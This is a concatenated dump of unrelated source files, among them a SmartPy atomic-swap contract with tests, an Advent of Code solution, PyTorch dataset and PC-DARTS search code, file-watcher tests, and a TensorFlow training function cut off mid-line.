sp.verify(self.data.swaps[_hashedSecret].refundTimestamp > sp.now) sp.verify(self.data.swaps[_hashedSecret].hashedSecret == sp.sha256( sp.sha256(_secret))) """ checks whether the swap can bve refunded args: _hashedSecret: hashed secret of the swap """ def isRefundable(self, _hashedSecret): sp.verify((self.data.swaps[_hashedSecret].state == State.Initiated) | ( self.data.swaps[_hashedSecret].state == State.Waiting)) sp.verify(self.data.swaps[_hashedSecret].refundTimestamp <= sp.now) """ Toggle contract active state args: _active: boolean value [tru:active, false:inactive] representing contract state """ @sp.entry_point def toggleContractState(self, _active): self.onlyByAdmin() self.data.active = _active """ Update reward for swaps responses args: _reward: a value representing the reward basis points """ @sp.entry_point def updateReward(self, _reward): self.onlyByAdmin() self.data.reward = _reward """ Initiate new swap without counterParty details args: _hashedSecret: hash of the current swap secret _initiator_eth_addr: tezos address of the current swap initiator _amount: amount of fa1.2 tokens 
exchanged in the swap _refundTimestamp: unix time(sec) after which the swap expires """ @sp.entry_point def initiateWait(self, _amount, _hashedSecret, _refundTimestamp, initiator_eth_addr): self.contractIsActive() self.isInitiable(_hashedSecret, _refundTimestamp) c = sp.contract(sp.TRecord(from_=sp.TAddress, to_=sp.TAddress, value=sp.TNat).layout(("from_ as from", ("to_ as to", "value"))), self.data.fa12, entry_point="transfer").open_some() transferData = sp.record( from_=sp.sender, to_=sp.self_address, value=_amount) sp.transfer(transferData, sp.mutez(0), c) self.data.swaps[_hashedSecret] = sp.record(hashedSecret=_hashedSecret, initiator_eth_addr=initiator_eth_addr, initiator=sp.sender, participant=sp.sender, refundTimestamp=_refundTimestamp, value=_amount, state=State.Waiting) """ Add counter-party details to an existing(initiated) swap args: _hashedSecret: hashed secret of the swap being updated _participant: participant/counter-party tezos address """ @sp.entry_point def addCounterParty(self, _hashedSecret, _participant): self.contractIsActive() self.checkState(_hashedSecret, State.Waiting) self.onlyByInitiator(_hashedSecret) self.data.swaps[_hashedSecret].state = State.Initiated self.data.swaps[_hashedSecret].participant = _participant """ Redeem the swap if possible args: _hashedSecret: hashed secret of the swap being redeemed _secret: secret for the swap which produced the corresponding hashedSecret """ @sp.entry_point def redeem(self, _hashedSecret, _secret): self.checkState(_hashedSecret, State.Initiated) self.isRedeemable(_hashedSecret, _secret) c = sp.contract(sp.TRecord(from_=sp.TAddress, to_=sp.TAddress, value=sp.TNat).layout(("from_ as from", ("to_ as to", "value"))), self.data.fa12, entry_point="transfer").open_some() transferData = sp.record( from_=sp.self_address, to_=self.data.swaps[_hashedSecret].participant, value=self.data.swaps[_hashedSecret].value) sp.transfer(transferData, sp.mutez(0), c) del self.data.swaps[_hashedSecret] """ Refund the swap if possible args: _hashedSecret: hashed secret of the swap being refunded """ @sp.entry_point def refund(self, _hashedSecret): self.isRefundable(_hashedSecret) c = sp.contract(sp.TRecord(from_=sp.TAddress, to_=sp.TAddress, value=sp.TNat).layout(("from_ as from", ("to_ as to", "value"))), self.data.fa12, entry_point="transfer").open_some() transferData = sp.record( from_=sp.self_address, to_=self.data.swaps[_hashedSecret].initiator, value=self.data.swaps[_hashedSecret].value) sp.transfer(transferData, sp.mutez(0), c) del self.data.swaps[_hashedSecret] @sp.add_test(name="Token Swap") def test(): admin = sp.test_account("Administrator") alice = sp.test_account("Alice") bob = sp.test_account("Bob") init_eth = "0x91f79893E7B923410Ef1aEba6a67c6fab0sfsdgffd" hashSecret = sp.sha256(sp.sha256(sp.bytes( "0x68656c6c6f666473667364666c64736a666c73646a6664736a6673646a6b666a"))) token_metadata = { "decimals" : "18", # Mandatory by the spec "name" : "My Great Token", # Recommended "symbol" : "MGT", # Recommended # Extra fields "icon" : 'https://smartpy.io/static/img/logo-only.svg' } contract_metadata = { "" : "ipfs://QmaiAUj1FFNGYTu8rLBjc3eeN9cSKwaF8EGMBNDmhzPNFd", } c2 = FA12.FA12(admin.address, config = FA12.FA12_config(support_upgradable_metadata = True), token_metadata = token_metadata, contract_metadata = contract_metadata) c1 = TokenSwap(_admin=admin.address, _fa12=c2.address) scenario = sp.test_scenario() scenario.table_of_contents() scenario.h1("Atomic Swap") scenario += c1 scenario.h2("Accounts") scenario.show([admin, alice, bob]) 
scenario.h2("FA1.2") scenario.h3("Entry points") scenario += c2 scenario.h3("Admin mints a few coins") scenario += c2.mint(address=alice.address, value=12).run(sender=admin) scenario += c2.mint(address=alice.address, value=3).run(sender=admin) scenario += c2.mint(address=alice.address, value=3).run(sender=admin) scenario.h2("Alice approves Contract") scenario += c2.approve(spender=c1.address, value=10).run(sender=alice) scenario.h2("Swap[Wait] Testing") # no operations work without contract being active scenario += c1.initiateWait(_hashedSecret=hashSecret, initiator_eth_addr=init_eth, _refundTimestamp=sp.timestamp( 159682500), _amount=5).run(sender=alice, now=sp.timestamp(159682400), valid=False) # activate only by admin scenario += c1.toggleContractState(True).run(sender=alice, valid=False) scenario += c1.toggleContractState(True).run(sender=admin) # update reward only by admin scenario += c1.updateReward(50).run(sender=alice, valid=False) scenario += c1.updateReward(50).run(sender=admin) # initiate new swap scenario += c1.initiateWait(_hashedSecret=hashSecret, initiator_eth_addr=init_eth, _refundTimestamp=sp.timestamp( 159682500), _amount=5).run(sender=alice, now=sp.timestamp(159682400)) # balance check scenario.verify(c2.data.balances[c1.address].balance == sp.nat(5)) scenario.verify(c2.data.balances[alice.address].balance == sp.nat(13)) # cannot redeem before it is activated & initiated scenario += c1.redeem(_hashedSecret=hashSecret, _secret=sp.bytes( "0x68656c6c6f666473667364666c64736a666c73646a6664736a6673646a6b666a")).run(sender=bob, now=sp.timestamp(159682450), valid=False) # successful add participant only by initiator scenario += c1.addCounterParty(_hashedSecret=hashSecret, _participant=bob.address).run(sender=bob, valid=False) # successful add participant only by initiator scenario += c1.addCounterParty(_hashedSecret=hashSecret, _participant=bob.address).run(sender=alice) # cannot be redeemed with wrong secret scenario += c1.redeem(_hashedSecret=hashSecret, _secret=sp.bytes( "0x12345678aa")).run(sender=bob, now=sp.timestamp(159682450), valid=False) # cannot be redeemed after refundtime has come scenario += c1.redeem(_hashedSecret=hashSecret, _secret=sp.bytes( "0x68656c6c6f666473667364666c64736a666c73646a6664736a6673646a6b666a")).run(sender=bob, now=sp.timestamp(159682550), valid=False) # new swap with the same hash cannot be added unless the previous one is redeemed/refunded scenario += c1.initiateWait(_hashedSecret=hashSecret, initiator_eth_addr=init_eth, _refundTimestamp=sp.timestamp( 159682500), _amount=5).run(sender=alice, amount=sp.tez(2), now=sp.timestamp(159682400), valid=False) # successful redeem can be initiated by anyone but funds transfered to participant scenario += c1.redeem(_hashedSecret=hashSecret, _secret=sp.bytes("0x68656c6c6f666473667364666c64736a666c73646a6664736a6673646a6b666a")).run(sender=bob, now=sp.timestamp(159682450)) # balance check scenario.verify(c2.data.balances[c1.address].balance == sp.nat(0)) scenario.verify(c2.data.balances[bob.address].balance == sp.nat(5)) # successful swap creation with same hash after redeem scenario += c1.initiateWait(_hashedSecret=hashSecret, initiator_eth_addr=init_eth, _refundTimestamp=sp.timestamp( 159682500), _amount=5).run(sender=alice, now=sp.timestamp(159682400)) # balance check scenario.verify(c2.data.balances[c1.address].balance == sp.nat(5)) scenario.verify(c2.data.balances[alice.address].balance == sp.nat(8)) # cannot be refunded before the refundtime scenario += c1.refund(hashSecret).run(sender=bob, 
now=sp.timestamp(159682450), valid=False) scenario += c1.refund(hashSecret).run(sender=alice, now=sp.timestamp(159682450), valid=False) # can be refunded in any initated or waiting state if refund time has come, can be done by anyone but funds transfered only to initiator scenario += c1.refund(hashSecret).run(sender=bob, now=sp.timestamp(159682550)) # cannot be refunded again once it has been refunded scenario += c1.refund(hashSecret).run(sender=alice, now=sp.timestamp(159682550), valid=False) # balance check scenario.verify(c2.data.balances[c1.address].balance == sp.nat(0)) scenario.verify(c2.data.balances[alice.address].balance == sp.nat(13)) sp.add_compilation_target("TokenSwap", TokenSwap(_admin=sp.address("tz1Y8UNsMSCXyDgma8Ya51eLx8Qu4AoLm8vt"), _fa12=sp.address("KT1Y8UNsMSCXyDgma8Ya51eLx8Qu4AoLm8vt")), storage=None)
python
with open('Day10 input.txt') as f: lines = f.readlines() chunk_dict = { '(':')', '[':']', '{':'}', '<':'>' } score_dict = { ')':3, ']':57, '}':1197, '>':25137 } corrupted = [] score = 0 for line in lines: chunk = '' for l in line: if l in ['(','[','{','<']: chunk+=l print(chunk) if l in [')',']','}','>']: chunk, c = chunk[:-1], chunk[-1] if chunk_dict[c] != l: score += score_dict[l] print('Found an unexpected '+l) corrupted.append(line) break print(score) incompletes = [x for x in lines if x not in corrupted] inc_chunks = [] for inc in incompletes: chunk = '' for l in inc: if l in ['(','[','{','<']: chunk+=l print(chunk) if l in [')',']','}','>']: chunk = chunk[:-1] inc_chunks.append(chunk) inc_score_dict = { '(':1, '[':2, '{':3, '<':4 } inc_scores = [] for inc in inc_chunks: score = 0 for i in inc[::-1]: score *= 5 score += inc_score_dict[i] inc_scores.append(score) inc_scores.sort() print(inc_scores[(len(inc_scores)//2)])
python
#!/usr/bin/python
# encoding: utf-8

import random
import torch
from torch.utils.data import Dataset
from torch.utils.data import sampler
import torchvision.transforms as transforms
import lmdb
import six
import sys
from PIL import Image
import numpy as np

# Notes on lmdb usage: this code was originally written against Python 2.x and
# therefore works with bytestrings rather than unicode, so under Python 3.x every
# key and value has to be explicitly encoded and decoded.
# https://lmdb.readthedocs.io/en/release/
# lmdb uses "bytestring" to mean either the Python<=2.7 str() type, or the
# Python>=3.0 bytes() type, depending on the Python version in use.
# Always explicitly encode and decode any Unicode values before passing them to LMDB.


class lmdbDataset(Dataset):

    def __init__(self, root=None, transform=None, target_transform=None):
        self.env = lmdb.open(
            root,
            max_readers=1,
            readonly=True,
            lock=False,
            readahead=False,
            meminit=False)

        if not self.env:
            print('cannot create lmdb from %s' % (root))
            sys.exit(0)

        with self.env.begin(write=False) as txn:
            nSamples = int(txn.get('num-samples'.encode()).decode())
            self.nSamples = nSamples

        self.transform = transform
        self.target_transform = target_transform

    def __len__(self):
        return self.nSamples

    def __getitem__(self, index):
        assert index <= len(self), 'index range error'
        index += 1
        with self.env.begin(write=False) as txn:
            img_key = 'image-%09d' % index
            imgbuf = txn.get(img_key.encode())

            buf = six.BytesIO()
            buf.write(imgbuf)
            buf.seek(0)
            try:
                img = Image.open(buf).convert('L')
            except IOError:
                print('Corrupted image for %d' % index)
                return self[index + 1]

            if self.transform is not None:
                img = self.transform(img)

            label_key = 'label-%09d' % index
            label = txn.get(label_key.encode()).decode()

            if self.target_transform is not None:
                label = self.target_transform(label)

        return (img, label)


class resizeNormalize(object):

    def __init__(self, size, interpolation=Image.BILINEAR):
        self.size = size
        self.interpolation = interpolation
        self.toTensor = transforms.ToTensor()

    def __call__(self, img):
        img = img.resize(self.size, self.interpolation)
        img = self.toTensor(img)
        img.sub_(0.5).div_(0.5)
        return img


class randomSequentialSampler(sampler.Sampler):

    def __init__(self, data_source, batch_size):
        self.num_samples = len(data_source)
        self.batch_size = batch_size

    def __iter__(self):
        n_batch = len(self) // self.batch_size
        tail = len(self) % self.batch_size
        index = torch.LongTensor(len(self)).fill_(0)
        for i in range(n_batch):
            random_start = random.randint(0, len(self) - self.batch_size)
            # torch.range is deprecated; torch.arange(n) yields the same 0..n-1 values
            batch_index = random_start + torch.arange(0, self.batch_size)
            index[i * self.batch_size:(i + 1) * self.batch_size] = batch_index
        # deal with tail
        if tail:
            random_start = random.randint(0, len(self) - self.batch_size)
            tail_index = random_start + torch.arange(0, tail)
            index[(i + 1) * self.batch_size:] = tail_index

        return iter(index)

    def __len__(self):
        return self.num_samples


class alignCollate(object):

    def __init__(self, imgH=32, imgW=100, keep_ratio=False, min_ratio=1):
        self.imgH = imgH
        self.imgW = imgW
        self.keep_ratio = keep_ratio
        self.min_ratio = min_ratio

    def __call__(self, batch):
        images, labels = zip(*batch)

        imgH = self.imgH
        imgW = self.imgW

        output_images = []
        for image in images:
            if self.keep_ratio:
                w, h = image.size
                ratio = w / float(h)
                imgW = int(np.floor(ratio * imgH))
                imgW = min(imgH * self.min_ratio, imgW)  # assure image.w <= imgW

            # resize to the same imgH
            transform = resizeNormalize((imgW, imgH))
            output_images.append(transform(image))

        # padding
        # image.shape i.e. (1, 32, 100)
        max_image_width = max([image.shape[2] for image in output_images])
        max_label_length = max([len(label) for label in labels])

        batch_size = len(output_images)
        channel_size = 1

        inputs = np.zeros((batch_size, channel_size, imgH, max_image_width), dtype='float32')
        # '_' for blank label
        output_labels = [['_'] * max_label_length for _ in range(batch_size)]

        for x in range(batch_size):
            image = output_images[x]
            width = image.shape[2]
            inputs[x, :, :, :width] = image
            output_labels[x][:len(labels[x])] = labels[x]

        # list to str
        output_labels = [''.join(x) for x in output_labels]

        images = torch.cat([torch.from_numpy(t).unsqueeze(0) for t in inputs], 0)

        return images, output_labels
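
# A minimal sketch (not part of the original dataset code) illustrating the
# encode/decode convention described in the comment at the top of this file:
# under Python 3 every key and value handed to LMDB must be bytes. The path
# and map_size below are placeholders.
def _lmdb_roundtrip_demo(path='/tmp/demo_lmdb'):
    env = lmdb.open(path, map_size=1 << 20)
    with env.begin(write=True) as txn:
        txn.put('num-samples'.encode(), str(1).encode())
        txn.put(('label-%09d' % 1).encode(), 'hello'.encode())
    with env.begin(write=False) as txn:
        n = int(txn.get('num-samples'.encode()).decode())
        label = txn.get(('label-%09d' % 1).encode()).decode()
    return n, label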
python
class Occurrence(object):
    """
    An Occurrence is an incarnation of a recurring event for a given date.
    """
    def __init__(self, event, start, end):
        self.event = event
        self.start = start
        self.end = end

    def __unicode__(self):
        return "%s to %s" % (self.start, self.end)

    def __cmp__(self, other):
        rank = cmp(self.start, other.start)
        if rank == 0:
            return cmp(self.end, other.end)
        return rank
python
# some modules use the old-style import: explicitly include
# the new module when the old one is referenced
hiddenimports = ["email.mime.text", "email.mime.multipart"]
python
import torch import torch.nn as nn import torch.nn.functional as F import copy from xnas.search_space.DARTS.ops import * from torch.autograd import Variable def channel_shuffle(x, groups): batchsize, num_channels, height, width = x.data.size() channels_per_group = num_channels // groups # reshape x = x.view(batchsize, groups, channels_per_group, height, width) x = torch.transpose(x, 1, 2).contiguous() # flatten x = x.view(batchsize, -1, height, width) return x class PcMixedOp(nn.Module): def __init__(self, C_in, C_out, stride, basic_op_list=None): super().__init__() self.k = 4 self.mp = nn.MaxPool2d(2, 2) self._ops = nn.ModuleList() assert basic_op_list is not None, "the basic op list cannot be none!" basic_primitives = basic_op_list for primitive in basic_primitives: op = OPS_[primitive](C_in//self.k, C_out//self.k, stride, affine=False) self._ops.append(op) def forward(self, x, weights): # channel proportion k=4 dim_2 = x.shape[1] xtemp = x[:, : dim_2//self.k, :, :] xtemp2 = x[:, dim_2//self.k:, :, :] assert len(self._ops) == len(weights) ''' temp1 = 0 for i, value in enumerate(weights): if value == 1: temp1 += self._ops[i](xtemp) if 0 < value < 1: temp1 += value * self._ops[i](xtemp)''' _x = [] for i, value in enumerate(weights): if value == 1: _x.append(self._ops[i](xtemp)) if 0 < value < 1: _x.append(value * self._ops[i](xtemp)) # reduction cell needs pooling before concat part_x = sum(_x) if part_x.shape[2] == x.shape[2]: ans = torch.cat([part_x, xtemp2], dim=1) else: ans = torch.cat([part_x, self.mp(xtemp2)], dim=1) ans = channel_shuffle(ans, self.k) # ans = torch.cat([ans[ : , dim_2//4:, :, :],ans[ : , : dim_2//4, :, :]],dim=1) # except channe shuffle, channel shift also works return ans # the search cell in darts class PcDartsCell(nn.Module): def __init__(self, n_nodes, C_pp, C_p, C, reduction_p, reduction, basic_op_list, multiplier): """ Args: n_nodes: # of intermediate n_nodes C_pp: C_out[k-2] C_p : C_out[k-1] C : C_in[k] (current) reduction_p: flag for whether the previous cell is reduction cell or not reduction: flag for whether the current cell is reduction cell or not """ super().__init__() self.reduction = reduction self.n_nodes = n_nodes self._multiplier = multiplier self.basic_op_list = basic_op_list # If previous cell is reduction cell, current input size does not match with # output size of cell[k-2]. So the output[k-2] should be reduced by preprocessing. 
if reduction_p: self.preproc0 = FactorizedReduce(C_pp, C, affine=False) else: self.preproc0 = ReluConvBn(C_pp, C, 1, 1, 0, affine=False) self.preproc1 = ReluConvBn(C_p, C, 1, 1, 0, affine=False) # generate dag self.dag = nn.ModuleList() for i in range(self.n_nodes): self.dag.append(nn.ModuleList()) for j in range(2+i): # include 2 input nodes # reduction should be used only for input node stride = 2 if reduction and j < 2 else 1 op = PcMixedOp(C, C, stride, self.basic_op_list) self.dag[i].append(op) def forward(self, s0, s1, sample, sample2): s0 = self.preproc0(s0) s1 = self.preproc1(s1) states = [s0, s1] w_dag = darts_weight_unpack(sample, self.n_nodes) w_w_dag = darts_weight_unpack(sample2, self.n_nodes) for edges, w_list, w_w_list in zip(self.dag, w_dag, w_w_dag): s_cur = sum(ww * edges[i](s, w) for i, (s, w, ww) in enumerate(zip(states, w_list, w_w_list))) states.append(s_cur) s_out = torch.cat(states[-self._multiplier:], 1) return s_out # PcDartsCNN class PcDartsCNN(nn.Module): def __init__(self, C=16, n_classes=10, n_layers=8, n_nodes=4, basic_op_list=[], multiplier=4): super().__init__() stem_multiplier = 3 self._multiplier = multiplier self.C_in = 3 # 3 self.C = C # 16 self.n_classes = n_classes # 10 self.n_layers = n_layers # 8 self.n_nodes = n_nodes # 4 self.basic_op_list = ['none','max_pool_3x3', 'avg_pool_3x3', 'skip_connect', 'sep_conv_3x3', 'sep_conv_5x5', 'dil_conv_3x3', 'dil_conv_5x5' ] if len(basic_op_list) == 0 else basic_op_list C_cur = stem_multiplier * C # 3 * 16 = 48 self.stem = nn.Sequential( nn.Conv2d(self.C_in, C_cur, 3, 1, 1, bias=False), nn.BatchNorm2d(C_cur) ) # for the first cell, stem is used for both s0 and s1 # [!] C_pp and C_p is output channel size, but C_cur is input channel size. C_pp, C_p, C_cur = C_cur, C_cur, C # 48 48 16 self.cells = nn.ModuleList() reduction_p = False for i in range(n_layers): # Reduce featuremap size and double channels in 1/3 and 2/3 layer. 
if i in [n_layers // 3, 2 * n_layers // 3]: C_cur *= 2 reduction = True else: reduction = False cell = PcDartsCell(n_nodes, C_pp, C_p, C_cur, reduction_p, reduction, self.basic_op_list, multiplier) reduction_p = reduction self.cells.append(cell) C_cur_out = C_cur * n_nodes C_pp, C_p = C_p, C_cur_out self.gap = nn.AdaptiveAvgPool2d(1) self.linear = nn.Linear(C_p, n_classes) # number of edges per cell self.num_edges = sum(list(range(2, self.n_nodes + 2))) # whole edges self.all_edges = 2 * self.num_edges def forward(self, x, sample, sample2): s0 = s1 = self.stem(x) for i, cell in enumerate(self.cells): if cell.reduction: alphas_reduce = sample[self.num_edges:] betas_reduce = sample2[self.num_edges:] weights = F.softmax(alphas_reduce, dim=-1) n = 3 start = 2 weights2 = F.softmax(betas_reduce[0:2], dim=-1) for i in range(self.n_nodes - 1): end = start + n tw2 = F.softmax(betas_reduce[start:end], dim=-1) start = end n += 1 weights2 = torch.cat([weights2, tw2], dim=0) else: alphas_normal = sample[0:self.num_edges] betas_normal = sample2[0:self.num_edges] weights = F.softmax(alphas_normal, dim=-1) n = 3 start = 2 weights2 = F.softmax(betas_normal[0:2], dim=-1) for i in range(self.n_nodes - 1): end = start + n tw2 = F.softmax(betas_normal[start:end], dim=-1) start = end n += 1 weights2 = torch.cat([weights2, tw2], dim=0) s0, s1 = s1, cell(s0, s1, weights, weights2) out = self.gap(s1) out = out.view(out.size(0), -1) # flatten logits = self.linear(out) return logits def genotype(self, theta, theta2): Genotype = namedtuple( 'Genotype', 'normal normal_concat reduce reduce_concat') a_norm = theta[0:self.num_edges] a_reduce = theta[self.num_edges:] b_norm = theta2[0:self.num_edges] b_reduce = theta2[self.num_edges:] weightn = F.softmax(a_norm, dim=-1) weightr = F.softmax(a_reduce, dim=-1) n = 3 start = 2 weightsn2 = F.softmax(b_norm[0:2], dim=-1) weightsr2 = F.softmax(b_reduce[0:2], dim=-1) for i in range(self.n_nodes - 1): end = start + n tn2 = F.softmax(b_norm[start:end], dim=-1) tw2 = F.softmax(b_reduce[start:end], dim=-1) start = end n += 1 weightsn2 = torch.cat([weightsn2, tn2], dim=0) weightsr2 = torch.cat([weightsr2, tw2], dim=0) theta_norm = darts_weight_unpack(weightn, self.n_nodes) theta_reduce = darts_weight_unpack(weightr, self.n_nodes) theta2_norm = darts_weight_unpack(weightsn2, self.n_nodes) theta2_reduce = darts_weight_unpack(weightsr2, self.n_nodes) for t, etheta in enumerate(theta_norm): for tt, eetheta in enumerate(etheta): theta_norm[t][tt] *= theta2_norm[t][tt] for t, etheta in enumerate(theta_reduce): for tt, eetheta in enumerate(etheta): theta_reduce[t][tt] *= theta2_reduce[t][tt] gene_normal = pc_parse_from_numpy( theta_norm, k=2, basic_op_list=self.basic_op_list) gene_reduce = pc_parse_from_numpy( theta_reduce, k=2, basic_op_list=self.basic_op_list) concat = range(2 + self.n_nodes - self._multiplier, 2 + self.n_nodes) # concat all intermediate nodes return Genotype(normal=gene_normal, normal_concat=concat, reduce=gene_reduce, reduce_concat=concat) def pc_parse_from_numpy(alpha, k, basic_op_list=None): """ parse continuous alpha to discrete gene. alpha is ParameterList: ParameterList [ Parameter(n_edges1, n_ops), Parameter(n_edges2, n_ops), ... ] gene is list: [ [('node1_ops_1', node_idx), ..., ('node1_ops_k', node_idx)], [('node2_ops_1', node_idx), ..., ('node2_ops_k', node_idx)], ... ] each node has two edges (k=2) in CNN. 
""" gene = [] assert basic_op_list[0] == 'none' # assume last PRIMITIVE is 'none' # 1) Convert the mixed op to discrete edge (single op) by choosing top-1 weight edge # 2) Choose top-k edges per node by edge score (top-1 weight in edge) for edges in alpha: # edges: Tensor(n_edges, n_ops) edge_max, primitive_indices = torch.topk( torch.tensor(edges[:, 1:]), 1) # ignore 'none' topk_edge_values, topk_edge_indices = torch.topk(edge_max.view(-1), k) node_gene = [] for edge_idx in topk_edge_indices: prim_idx = primitive_indices[edge_idx] prim = basic_op_list[prim_idx+1] node_gene.append((prim, edge_idx.item())) gene.append(node_gene) return gene def _PcdartsCNN(): from xnas.core.config import cfg return PcDartsCNN( C=cfg.SPACE.CHANNEL, n_classes=cfg.SEARCH.NUM_CLASSES, n_layers=cfg.SPACE.LAYERS, n_nodes=cfg.SPACE.NODES, basic_op_list=cfg.SPACE.BASIC_OP)
python
# This is just a demo file
print("Hello world")
print("this is an update to my previous code")
python
import os import asyncio import sys from typing import Any, Dict, Union, List # noqa from tomodachi.watcher import Watcher def test_watcher_auto_root() -> None: watcher = Watcher() assert watcher.root == [os.path.realpath(sys.argv[0].rsplit('/', 1)[0])] def test_watcher_empty_directory() -> None: root_path = '{}/tests/watcher_root/empty'.format(os.path.realpath(os.getcwd())) watcher = Watcher(root=[root_path]) assert len(watcher.root) == 1 assert isinstance(watcher.watched_files, dict) assert len(watcher.watched_files) == 0 def test_watcher_default_ignored_directory() -> None: root_path = '{}/tests/watcher_root/__tmp__'.format(os.path.realpath(os.getcwd())) watcher = Watcher(root=[root_path]) assert len(watcher.root) == 1 assert isinstance(watcher.watched_files, dict) assert len(watcher.watched_files) == 0 def test_watcher_configurable_ignored_directory() -> None: root_path = '{}/tests/watcher_root/configurable_ignored'.format(os.path.realpath(os.getcwd())) watcher = Watcher(root=[root_path]) assert len(watcher.root) == 1 assert isinstance(watcher.watched_files, dict) assert len(watcher.watched_files) == 1 watcher = Watcher(root=[root_path], configuration={'options': {'watcher': {'ignored_dirs': ['configurable_ignored']}}}) assert len(watcher.root) == 1 assert isinstance(watcher.watched_files, dict) assert len(watcher.watched_files) == 0 def test_watcher_callback(loop: Any) -> None: root_path = '{}/tests/watcher_root'.format(os.path.realpath(os.getcwd())) watcher = Watcher(root=[root_path]) assert len(watcher.root) == 1 assert isinstance(watcher.watched_files, dict) assert len(watcher.watched_files) == 2 result = watcher.update_watched_files() assert result == {} watcher.watched_files = {'_test': 0} watcher.watched_files_crc = {'_test': ''} result = watcher.update_watched_files(reindex=True) assert len(result.get('added', 0)) == 2 assert len(result.get('removed', 0)) == 1 assert len(result.get('updated', 0)) == 0 class Test(): callbacks_run = {} # type: Dict[int, bool] @classmethod async def _async(cls) -> None: async def cb1(updated_files: Union[List, set]) -> None: cls.callbacks_run[1] = True async def cb2(updated_files: Union[List, set]) -> None: cls.callbacks_run[2] = True task = await watcher.watch(callback_func=cb1) await asyncio.sleep(1.0) task.cancel() watcher.watched_files = {'_test': 0} watcher.watched_files_crc = {'_test': ''} task = await watcher.watch(callback_func=cb2) await asyncio.sleep(1.0) task.cancel() assert cls.callbacks_run.get(1) is None assert cls.callbacks_run.get(2) is True loop.run_until_complete(Test._async())
python
import tensorflow as tf import numpy as np from optimizer import distributed_optimizer from task_module import pretrain, classifier, pretrain_albert import tensorflow as tf try: from distributed_single_sentence_classification.model_interface import model_zoo except: from distributed_single_sentence_classification.model_interface import model_zoo import tensorflow as tf import numpy as np from optimizer import optimizer from model_io import model_io from utils.bert import bert_seq_utils, bert_seq_sample_utils from task_module import classifier from task_module import tsa_pretrain import tensorflow as tf from metric import tf_metrics def train_metric(input_ids, predicted_logits, features, **kargs): labels = input_ids[:, 1:] # <S>,1,2,3,<T>,<PAD>, <PAD> logits = predicted_logits[:, :-1] # 1,2,3,<T>, xxx, xxx input_id_logits = tf.nn.sparse_softmax_cross_entropy_with_logits( labels=labels, logits=logits) if kargs.get('mask_type', 'left2right') == 'left2right': tf.logging.info("***** using left2right mask and loss *****") sequence_mask = tf.to_float(tf.not_equal(features['input_ori_ids'][:, 1:], kargs.get('[PAD]', 0))) elif kargs.get('mask_type', 'left2right') == 'seq2seq': tf.logging.info("***** using seq2seq mask and loss *****") sequence_mask = tf.to_float(features['segment_ids'][:, 1:]) if not kargs.get('use_tpu', False): tf.summary.scalar("loss mask", tf.reduce_mean(sequence_mask)) # sequence_mask = tf.to_float(tf.not_equal(labels, # kargs.get('[PAD]', 0))) per_example_perplexity = tf.reduce_sum(input_id_logits * sequence_mask, axis=-1) # batch per_example_perplexity /= tf.reduce_sum(sequence_mask, axis=-1) # batch perplexity = tf.reduce_mean(tf.exp(per_example_perplexity)) lm_token_accuracy = tf.equal( tf.cast(labels, tf.int32), tf.cast(tf.argmax(logits, axis=-1), tf.int32)) lm_token_accuracy = tf.reduce_sum(tf.cast(lm_token_accuracy, tf.float32) * sequence_mask, axis=-1) lm_token_accuracy /= tf.reduce_sum(sequence_mask, axis=-1) # batch return { "perplexity": perplexity, "token_acc": tf.reduce_mean(lm_token_accuracy) } def eval_metric(input_ids, predicted_logits, sequence_mask): labels = input_ids[:, 1:] # <S>,1,2,3,<T>,<PAD>, <PAD> logits = predicted_logits[:, :-1] # 1,2,3,<T>, xxx, xxx input_id_logits = tf.nn.sparse_softmax_cross_entropy_with_logits( labels=labels, logits=logits) # sequence_mask = tf.to_float(tf.not_equal(labels, # kargs.get('[PAD]', 0))) per_example_perplexity = tf.reduce_sum(input_id_logits * sequence_mask, axis=-1) # batch per_example_perplexity /= tf.reduce_sum(sequence_mask, axis=-1) # batch perplexity = tf.exp(per_example_perplexity) ppl_avg = tf.metrics.mean(values=perplexity) lm_token_accuracy = tf.metrics.accuracy( labels=tf.cast(labels, tf.int32), predictions=tf.cast(tf.argmax(logits, axis=-1), tf.int32), weights=sequence_mask) return { "perplexity":ppl_avg, "token_acc":lm_token_accuracy } def classifier_model_fn_builder( model_config, num_labels, init_checkpoint, model_reuse=None, load_pretrained=True, model_io_config={}, opt_config={}, exclude_scope="", not_storage_params=[], target="a", **kargs): def model_fn(features, labels, mode, params): model_api = model_zoo(model_config) seq_features = {} for key in features: seq_features[key] = features[key] if 'input_ori_ids' in features: seq_features['input_ids'] = features["input_ori_ids"] else: features['input_ori_ids'] = seq_features['input_ids'] model = model_api(model_config, seq_features, labels, mode, target, reuse=tf.AUTO_REUSE, **kargs) if mode == tf.estimator.ModeKeys.TRAIN: dropout_prob = 
model_config.dropout_prob else: dropout_prob = 0.0 if model_io_config.fix_lm == True: scope = model_config.scope + "_finetuning" else: scope = model_config.scope # if mode == tf.estimator.ModeKeys.TRAIN: if kargs.get('mask_type', 'left2right') == 'left2right': tf.logging.info("***** using left2right mask and loss *****") sequence_mask = tf.to_float(tf.not_equal(features['input_ori_ids'][:, 1:], kargs.get('[PAD]', 0))) elif kargs.get('mask_type', 'left2right') == 'seq2seq': tf.logging.info("***** using seq2seq mask and loss *****") sequence_mask = tf.to_float(features['segment_ids'][:, 1:]) if not kargs.get('use_tpu', False): tf.summary.scalar("loss mask", tf.reduce_mean(sequence_mask)) # batch x seq_length print(model.get_sequence_output_logits().get_shape(), "===logits shape===") seq_loss = tf.nn.sparse_softmax_cross_entropy_with_logits( labels=features['input_ori_ids'][:, 1:], logits=model.get_sequence_output_logits()[:, :-1]) per_example_loss = tf.reduce_sum(seq_loss*sequence_mask, axis=-1) / (tf.reduce_sum(sequence_mask, axis=-1)+1e-10) loss = tf.reduce_mean(per_example_loss) model_io_fn = model_io.ModelIO(model_io_config) pretrained_tvars = model_io_fn.get_params(model_config.scope, not_storage_params=not_storage_params) lm_pretrain_tvars = model_io_fn.get_params("cls/predictions", not_storage_params=not_storage_params) pretrained_tvars.extend(lm_pretrain_tvars) use_tpu = 1 if kargs.get('use_tpu', False) else 0 if load_pretrained == "yes": use_tpu = 1 if kargs.get('use_tpu', False) else 0 scaffold_fn = model_io_fn.load_pretrained(pretrained_tvars, init_checkpoint, exclude_scope=exclude_scope, use_tpu=use_tpu) else: scaffold_fn = None if mode == tf.estimator.ModeKeys.TRAIN: if kargs.get('use_tpu', False): optimizer_fn = optimizer.Optimizer(opt_config) use_tpu = 1 tf.logging.info("***** using tpu with tpu-captiable optimizer *****") else: optimizer_fn = distributed_optimizer.Optimizer(opt_config) use_tpu = 0 tf.logging.info("***** using gpu with 